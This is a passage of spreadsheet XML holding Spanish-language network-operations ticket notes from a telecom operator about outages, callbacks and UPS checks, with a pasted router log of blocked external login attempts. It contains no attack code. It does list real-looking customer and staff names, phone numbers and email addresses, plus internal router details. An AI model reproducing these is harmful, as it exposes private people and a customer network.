COMO PARTE DEL SEGUIMIENTO AL CASO, SE ADJUNTAN LAS GRÁFICAS SOLICITADAS DEL SERVICIO PARA EL DÍA DE HOY ENTRE LAS 06:15 A LAS 16:15. QUEDAMOS AL PENDIENTE, GRACIAS DE ANTEMANO. SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>*- EDWIN JURACAN 41498782 (CLIENTE) INFORMA QUE EL DÍA DE HOY TUVO UNA CAIDA DE APROX 45 MINS, SE LE INFORMA SOBRE LA SATURACION DETECTADA, SOLICITA SE LE COMPARTAN LAS GRAFICAS DEL SERVICIO YA QUE CUENTA CON DOS (936500002T) Y AMBOS TUVIERON CAIDA, SE SOLICITA APOYO A CNOC CON EL ENVÍO DE GRAFICAS -*
-*</t>
  </si>
  <si>
    <t>F4591568</t>
  </si>
  <si>
    <t xml:space="preserve"> EDWIN JURACAN 41498782 (CLIENTE) INFORMA QUE LAS CAIDAS SON BASTANTES RECURRENTES, EL DÍA DE HOY PRESENTO UNA CAIDA EN LA MAÑANA, SOLICITA SE LE INDIQUE EL MOTIVO, SOLICITA SE LE PUEDA COMPARTIR GRAFICAS DEL SEVICIO YA QUE EL TIENE QUE ESTAR REINICIANDO EL CPE PARA QUE LEVANTE LA SEÑAL, LOS EQUIPOS ESTAN PROTEGIDOS CON UPS SEGUN EL TICKET DEL ID 936500001T  EL SERVICIO ESTUVO SATURADO, SE SOLICITA APOYO A CNOC  -*
-*</t>
  </si>
  <si>
    <t>F4591570</t>
  </si>
  <si>
    <t>23311525 . SE LLAMA A CLIENTE PERO NO RESPONDE SE LLAMA A VICTOR HUGO - 33356773 SOLO PARA CONSULTARLE SI AUN SE ENCUENTRA DE DESCANSO O SOLICITAR NUEVO CONTACTO A CENTRAL PERO NO RESPONDE-</t>
  </si>
  <si>
    <t>SE LLAMO A VICTOR QUIEN INDIA QUE ESTA DE DESCANSO  VICTOR HUGO - 33356773, 23311525. BRINDA OTRO CONTACTO PARA PRUEBAS, 5293-3268 &gt;&gt; DANIEL  NO RESPONDE-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52933268 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001598464</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL AL 5293-3268 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
ID 1001586848
**</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A CONTACTO BRINDADO PERO NO RESPONDE ENVIA A BUZON
5293-3268 &gt;&gt; DANIEL</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL AL 5293-3268 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
ID 1001567162
**</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A DANIEL SIN EMBARGO NO RESPONDE
5293-3268</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL 52933268 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001814419</t>
  </si>
  <si>
    <t>F4591576</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SARAI ALONSO AL 59460010 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001569935
**</t>
  </si>
  <si>
    <t>LUEGO DEL REINICIO DE LA PBX SERVICIO CONTINÚA CAIDO, PBX NO RESPONDE A NIVEL DE IP Y NO SE REGISTRA EN CENTRAL. CLIENTE INDICA QUE ESCALARÁ CON SU PROVEEDOR PARA QUE REVISEN SU PLANTA. SOLICITA SE LE LLAME A LAS 3 PM PARA VALIDAR. RESULTADO: LLAMADA HECHA
NOMBRE: 59460010
NÚMERO: 59460010
INICIO: HOY, 11:29 A. M.
FIN: HOY, 11:40 A. M.
DURACIÓN: 11:27
ID DE LLAMADA: 1001537607</t>
  </si>
  <si>
    <t>EN LINEA CON SARAI ALONSO 59460010, SE LE SOLICITA SU APOYO PARA UBICAR Y REINICIAR SU PLANTA PBX ID:1001537607</t>
  </si>
  <si>
    <t>F4591581</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALLAN HERNANDEZ 41495716 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001758858</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALLAN HERNANDEZ 41495716 MENCIONA QUE AUN ESTA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA LAS 16:00 HRS
-ID 1001773440</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALLAN HERNANDEZ 41495716 MENCIONA QUE EL SERVICIO ESTA FUNCIONANDO BIEN PERO HA SIDO MUY RECURRENTE EL INCONVENIENTE POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 11:30 HRS VALIDAR EL COMPORTAMIENTO DEL SERVICIO
CLIENTE SOLICITA EL LOGS DEL EQUIPO DESDE LAS 9:00 HRS LOGS  -- AHERNANDEZ@WORLDCONNECTION.COM
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001651608</t>
  </si>
  <si>
    <t>CLIENTE SR. ALLAN HERNANDEZ AL 41495716 INFORMA QUE CUANDO LLEVE SE QUEDA SIN ENLACE, Y ACTUALMENTE ESTA LENTO NO ALCANZA EL ANCHO DE BANDA CONTRATADO, SE LE INFORMA QUE SE TIENEN REGISTROS DE SATURACION, SOLICITA REVISION FISICA DE LOS EQUIPO Y CONEXIONES DESDE EL NODO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN HERNANDEZ AL 41495716 INDICA QUE SOLO 5 USUARIOS ESTAN USANDO EL SERVICIO QUE NO CREE QUE SEA SATURACION || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001567821
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALLAN HERNANDEZ 41495716 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001765571</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 41495716 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE. ADICIONAL SE CONSULTA A GESTIÓN N1 VÍA SKYPE SI SE LE ENVIÓ A CLIENTE LO SOLICITADO EN CRONO SIGUIENTE:
06/06/2022 17:52:33 GUATEMALA/CENTRO AMERICA (ODALIS ANAHI CARDENAS SALAZAR):
CLIENTE SOLICITA EL LOGS DEL EQUIPO DESDE LAS 9:00 HRS LOGS  -- AHERNANDEZ@WORLDCONNECTION.COM SE NOTIFICARA PARA EL SEGUIMIENTO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALLAN HERNANDEZ 41495716 MENCIONA QUE EL DIA DE HOY NO PRESENTO NINGUN PROBLEMA
-ID 1001865905</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN HERNANDEZ 41495716 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 1001860654
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN HERNANDEZ AL 41495716  NO RESPONDE || ENVIA A BUZON || SE
INTENTARA LUEGO **
ID 1001844638
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALLAN HERNANDEZ 41495716 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001853682 - 1001853905</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN HERNANDEZ AL 41495716  NO RESPONDE || ENVIA A BUZON || SE
INTENTARA LUEGO **
ID 1001849101
**</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A CLIENTE  ALLAN HERNANDEZ 41495716 MENCIONA QUE EL DIA DE HOY NO PRESENTO NINGUN PROBLEMA, SE LE ENVIAN CORREO AL CLIENTE CON LAS PRUEBAS, SIN INCONVENIENTES, SE PROCEDE A CIERRE DE FALLA
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 17:22
PARA: AHERNANDEZ@WORLDCONNECTION.COM &lt;AHERNANDEZ@WORLDCONNECTION.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: INESTABILIDAD || 815100001T || WORLD CONNECTION, S.A. || DUE CORPORATIVO - 4 AVENIDA 16-61 ZONA 10, 8 NIVEL
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, CON EL ID: 815100001T UBICANDO EN : 4 AVENIDA 16-61 ZONA 10, 8 NIVEL, ADJUNTO LAS PRUEBAS QUE SE REALIZARON EN SITIO, ADICIONAL ADJUNTO LOS LOG QUE HAY EN ROUTER, ESTOS LOG SON LOS INTENTOS QUE PERSONAL DE CLARO A ESTADO INGRESANDO, NO SE OBSERVAN ANOMALÍAS,  SE TIENE ERRORES YA QUE ÚNICAMENTE SE PERMITE UN USUARIO A LA VES , A NIVEL DE CLARO NO TENEMOS NINGÚN INCONVENIENTE, ADICIONAL COMPARTIRNOS CERTIFICACIÓN DE FO QUE SE REALIZO, SE OBSERVAN BUENOS PARAMETROS.
CC_WORLD_CONNECTION_GT_INTERNET_DUE_Z10#SHOW  LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 153111 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 153111 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 153115 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
NG FAILURES IS 0 SECS, [USER: ADMIN] [SOURCE: 37.202.16.224] [LOCALPORT: 23] [REASON: LOGIN AUTHENTICATION FAILED - BADUSER] [ACL: ACCESO] AT 22:43:42 UTC TUE JUN 7 2022
*JUN  7 22:45:42.094 UTC: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 22:45:42 UTC TUE JUN 7 2022
*JUN  7 22:46:00.724 UTC: %SEC_LOGIN-1-QUIET_MODE_ON: STILL TIMELEFT FOR WATCHING FAILURES IS 41 SECS, [USER: SHELL] [SOURCE: 72.69.225.246] [LOCALPORT: 23] [REASON: LOGIN AUTHENTICATION FAILED - BADUSER] [ACL: ACCESO] AT 22:46:00 UTC TUE JUN 7 2022
*JUN  7 22:48:00.723 UTC: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 22:48:00 UTC TUE JUN 7 2022
*JUN  7 22:53:41.095 UTC: %SEC_LOGIN-1-QUIET_MODE_ON: STILL TIMELEFT FOR WATCHING FAILURES IS 5 SECS, [USER: SYSTEM] [SOURCE: 90.142.45.196] [LOCALPORT: 23] [REASON: LOGIN AUTHENTICATION FAILED - BADUSER] [ACL: ACCESO] AT 22:53:41 UTC TUE JUN 7 2022
*JUN  7 22:55:41.096 UTC: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 22:55:41 UTC TUE JUN 7 2022
*JUN  7 22:56:12.446 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 192.168.207.25] [LOCALPORT: 23] AT 22:56:12 UTC TUE JUN 7 2022
*JUN  7 22:57:05.463 UTC: %SEC_LOGIN-1-QUIET_MODE_ON: STILL TIMELEFT FOR WATCHING FAILURES IS 35 SECS, [USER: SYSTEM] [SOURCE: 27.222.249.255] [LOCALPORT: 23] [REASON: LOGIN AUTHENTICATION FAILED - BADUSER] [ACL: ACCESO] AT 22:57:05 UTC TUE JUN 7 2022
*JUN  7 22:59:05.463 UTC: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 22:59:05 UTC TUE JUN 7 2022
*JUN  7 22:59:26.328 UTC: %SEC_LOGIN-1-QUIET_MODE_ON: STILL TIMELEFT FOR WATCHING FAILURES IS 39 SECS, [USER: SYSTEM] [SOURCE: 39.81.189.227] [LOCALPORT: 23] [REASON: LOGIN AUTHENTICATION FAILED - BADUSER] [ACL: ACCESO] AT 22:59:26 UTC TUE JUN 7 2022
*JUN  7 23:01:26.329 UTC: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 23:01:26 UTC TUE JUN 7 2022
*JUN  7 23:03:01.842 UTC: %SEC_LOGIN-1-QUIET_MODE_ON: STILL TIMELEFT FOR WATCHING FAILURES IS 24 SECS, [USER: ENABLE] [SOURCE: 156.208.57.214] [LOCALPORT: 23] [REASON: LOGIN AUTHENTICATION FAILED - BADUSER] [ACL: ACCESO] AT 23:03:01 UTC TUE JUN 7 2022
*JUN  7 23:05:01.844 UTC: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 23:05:01 UTC TUE JUN 7 2022
*JUN  7 17:06:56.584 GTM: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 23:06:56 UTC TUE JUN 7 2022 TO 17:06:56 GTM TUE JUN 7 2022, CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY0 (192.168.207.25).
*JUN  7 17:05:09.260 GTM: %SMART_LIC-5-SYSTEM_CLOCK_CHANGED: SMART AGENT FOR LICENSING SYSTEM CLOCK HAS BEEN CHANGED
*JUN  7 17:07:39.763 GTM: %SEC_LOGIN-1-QUIET_MODE_ON: STILL TIMELEFT FOR WATCHING FAILURES IS 22 SECS, [USER: TOMCAT] [SOURCE: 92.255.85.135] [LOCALPORT: 22] [REASON: LOGIN AUTHENTICATION FAILED] [ACL: ACCESO] AT 17:07:39 GTM TUE JUN 7 2022
*JUN  7 17:09:39.763 GTM: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 17:09:39 GTM TUE JUN 7 2022
*JUN  7 17:10:30.032 GTM: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 192.168.207.25] [LOCALPORT: 23] AT 17:10:30 GTM TUE JUN 7 2022
*JUN  7 17:10:36.741 GTM: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY0 (192.168.207.25)
*JUN  7 17:10:37.591 GTM: %SYS-6-LOGOUT: USER GESTIONIP HAS EXITED TTY SESSION 866(192.168.207.25)
*JUN  7 17:10:55.364 GTM: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 192.168.207.25] [LOCALPORT: 23] AT 17:10:55 GTM TUE JUN 7 2022
*JUN  7 17:11:01.159 GTM: %SYS-2-PRIVCFG_ENCRYPT: SUCCESSFULLY ENCRYPTED PRIVATE CONFIG FILE
*JUN  7 17:11:32.248 GTM: %SEC_LOGIN-1-QUIET_MODE_ON: STILL TIMELEFT FOR WATCHING FAILURES IS 7 SECS, [USER: SYSTEM] [SOURCE: 49.114.232.226] [LOCALPORT: 23] [REASON: LOGIN AUTHENTICATION FAILED - BADUSER] [ACL: ACCESO] AT 17:11:32 GTM TUE JUN 7 2022
*JUN  7 17:13:32.248 GTM: %SEC_LOGIN-5-QUIET_MODE_OFF: QUIET MODE IS OFF, BECAUSE BLOCK PERIOD TIMED OUT AT 17:13:32 GTM TUE JUN 7 2022
CC_WORLD_CONNECTION_GT_INTERNET_DUE_Z10#
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN HERNANDEZ 41495716 NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 1001757516
**</t>
  </si>
  <si>
    <t>F4591582</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL BRAN 25919048 MENCIONA QUE AL CONECTARSSE A LOS EQUIPOS NO TIENE SALIDA A INTERNET
CLIENTE SOLICITA SE LLAME AL MOVIL 74969604
-ID 1001536934</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL BRAN 74969604 QUIEN REALIZA ALGUNAS PRUEBAS Y EL SERVICIO RESTABLECE
-ID 1001542727 - 1001544040</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL BRAN 25919048 QUIEN SOLICITA SE INTENTE DE NUEVO LLAMAR AL MOVIL 74969604
-ID 1001541916</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 74969604 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001539435 - 1001539974</t>
  </si>
  <si>
    <t>F4591584</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO MORALES 77486934 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001547967</t>
  </si>
  <si>
    <t>F4591590</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ISRAEL GONZALEZ 52988845 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001629742</t>
  </si>
  <si>
    <t>F4591598</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SALVADOR SANTAANA-79511317##ENVIA A BUZON ## SE INTENTARA LUEGO
1001565943
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 12:52:33
1001566130
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:27
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 12:52:38</t>
  </si>
  <si>
    <t>### SE LE EXPLICA A CLIENTE QUE NOSOTROS NO PODEMOS AYUDARLE A VER EXTESNSIONES, NOSTORS UNICAMENTE TRNSPORTAMOS SEÑAL DE TEELFONIA Y LA PLANTA SE ENCARGAR DE DISTRUIRLA POR MEDIO DE EXTESNSIONES ##CLIENTE MOLESTO QUEDA ENTERADO + SE PROCEDE ALC IERRE DEL TICKET ##VIVO</t>
  </si>
  <si>
    <t>SE SIGUE EN LINEA- CLIENTE SE QUEJA DE QUE TIENE PROBLEMAS CON EL SERVICIO DE INTERNET POR QUE NO TIENE REPETIDORES + SERVICIO DE TELEFONIA Y QUE QUEIRE REVISION A NVIEL INTERNO### SE SIGUE EN LINEA QUEJANDOSE ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SALVADOR SANTAANA-79511317  ## SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SALVADOR SANTAANA-79511317 --ENVIA DIRECTO A BUZON ##SE DEBE DE VERIFICAR QUE REPORTA EL CLIENTE ## A NIVEL DE CLARO TODO OK
1001548767
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 11:59:44
1001548937
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 11:59:50</t>
  </si>
  <si>
    <t>F4591603</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO INDIQUE SI PUNTO REMOTO CUENTA CON UPS EN BUEN ESTADO
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 7 DE JUNIO DE 2022 15:32PARA: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; TELECOMUNICACIONES@GRUPOMONGE.COM &lt;TELECOMUNICACIONES@GRUPOMONGE.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO, REINICIDENTE PARA CLIENTE "CC_GMG_GT_INTERNET_PTO_BARRIOS"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO, SE OBSERVA QUE SE HA ALARMADO DE FORMA REINCIDENTE GENERANDO 12 TICKETS PROACTIVOS EL MES DE MAYO Y EL MES DE JUNIO 4, EN DIAGNOSTICO SE OBSERVA QUE LA CAUSA DE LA GENERACIÓN DE FALLAS SON REINICIOS SOBRE LOS EQUIPOS DE RED POR LO CUAL SOLICITAMOS SU APOYO INDICANDO SI PUNTO REMOTO "CC_GMG_GT_INTERNET_PTO_BARRIOS" CON ID "313900312T", CUENTA CON UPS EN BUEN ESTADO PARA LA PROTECCIÓN DE LOS EQUIPOS CONTRA LAS FALLAS DE ENERGÍA.
TICKET: F4591603
ID: 313900312T
IDENTIFICADOR DEL CLIENTE:  CC_GMG_GT_INTERNET_PTO_BARRIOS
UBICADO EN:  9 Y 8 AVENIDA PUERTO BARRIOS IZABAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE A JOSUE HERRERA EN EL GRUPO DE SKYPE
BUENAS TARDES @JOSUÉ, ACTUALMENTE SE TIENE FALLA PROACTIVA F4591603, SE OBSERVAN REINICIOS RECURRENTES EL MES DE MAYO GENERO 12 TICKETS Y ESTE MES 4, EL PROPOSITO ES LLAMAR A PUNTO REMOTO Y VALIDAR SI CUENTAN CON UPS EN BUEN ESTADO</t>
  </si>
  <si>
    <t>ADICIONAL CLIENTE JOSUE HERRERA INDICO QUE TIENDA NO CUENTA CON UPS, QUE HAN REALIZADO INSTALACION DE UPS EN LAS DISTINTAS TIENDAS PERO QUE ESPECICIAMCENTE EN CC_GMG_GT_INTERNET_PTO_BARRIOS, ESTA PENDIENTE DE INSTALACION DE UPS.</t>
  </si>
  <si>
    <t>CLIENTE COPIO A CARLOS LEAL COMENTA QUE ES EL ENCARGADO DE GMG GUATEMALA, HAY QUE ESPERAR LA RESPUESTA DEL CLIENTE.
DE: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;ENVIADO: MARTES, 7 DE JUNIO DE 2022 15:39PARA: SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; CARLOS.LEAL@GRUPOMONGE.COM &lt;CARLOS.LEAL@GRUPOMONGE.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;; TELECOMUNICACIONES@GRUPOMONGE.COM &lt;TELECOMUNICACIONES@GRUPOMONGE.COM&gt;ASUNTO: RE: ENLACE ALARMADO, REINICIDENTE PARA CLIENTE "CC_GMG_GT_INTERNET_PTO_BARRIOS"
++ CARLOS LEAL</t>
  </si>
  <si>
    <t>SE CONSULTA A JOSUE HERRARA DE GRUPO MONGE, SOBRE CONTACTOS EN EL PUNTO REMOTO PARA VERIFICAR TEMA DE UPS.</t>
  </si>
  <si>
    <t>F4591617</t>
  </si>
  <si>
    <t>**  SE VALIDA QUE NO SE TIENE RESPUESTA DE CLIENTE, SE ENVÍA NUEVAMENTE CORREO
RE: RES: [EXT] RE: GOODYEAR GUATEMALA - NEW ROUTER CONFIGURATION</t>
  </si>
  <si>
    <t>F4591628</t>
  </si>
  <si>
    <t>SE BRINDARA SEGUIMIENTO EL DIA DE MAÑANA CON CLIENTE PARA ACTUALIZACION DEL TEMA DE MANTENIMIENTO QUE TIENEN EN PUNTO REMOTO.</t>
  </si>
  <si>
    <t>SE LLAMO A 5B CONTESTA HECTOR COMENTA QUE AUN CONTINUA TRABAJOS POR PARTE DE LA EMPRESA ELECTRICA EN SECTOR, AUN ESTA DESCONECTADO ATM COMENTA QUE SE LLAME MAÑANA.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:02
FIN: HOY, 18:12
DURACIÓN: 9:12
ID DE LLAMADA: 3001214900</t>
  </si>
  <si>
    <t>ENLACE CONTINUA CAIDO COMENTA DANIEL DE MONITOREO 5B QUE ES UN PROBLEMA CON LA LINEA PRINCIPAL DE ENERGIA POR PARTE DE ENERGUATE ESTAN BRINDANDO SEGUIMIENTO, PERSONAL DE TAVSA DEJARON APAGADOS EQUIPOS POR LA INESTABILIDAD DE LA ENERGIA COMENTAN QUE FINALIZARAN TRABAJOS EL DIA DE MAÑANA.
2001990728
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:18
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 13/06/2022 18:49:27</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO DE CAJERO 5B ATIENDE CESAR QUIEN INDICA QUE AUN TIENEN PROBLEMAS DE ENERGIA Y SOLICITA QUE SE LLAME A LAS 15:30 PARA VERIFICAR SI LOS PROBLEMAS DE ENERGÍA CONTINUAN, INDICA QUE ES COMPLICADO SABER UN TIEMPO APROXIMADO DEBIDO A LAS LLUVIAS
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 12:18
FIN: HOY, 12:21
DURACIÓN: 2:46
ID DE LLAMADA: 3001342264</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 6 DE JUNIO DE 2022 16:26
PARA: SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL CAJERO: CC_TYT_GT_ATM0418
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM041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1628
ID: 47500943T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0418
UBICADO EN: TEXACO ESTANZUELA KM.141.5 ESQUIPULAS, ESTANZUELA, ZACAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4591639</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN FRANSISCO COMENTA QUE YA CUENTA CON SERIVICIO
1001654714
COLA:
NOMBRE: A: 0050432797867
NÚMERO: 0050432797867
DURACIÓN: 0:01:29
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050432797867
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 6/06/2022 17:54:28</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 3279-7867 NO RESPONDE, SE INETNTARA LUEGO
-ID 1001655063</t>
  </si>
  <si>
    <t>F4591642</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGELO CALDERA AL 89661010 Y BRINDA LOS SIGUIENTES DATOS PERO NO TIENE DIRECCION SOLICITO QUE SE LE LLAME A LA SRA. ROSA PARA LA DIRECCION PERO NO RESPONDE **
HORARIO DE ATENCION: 8:00 A 17:00 HRS
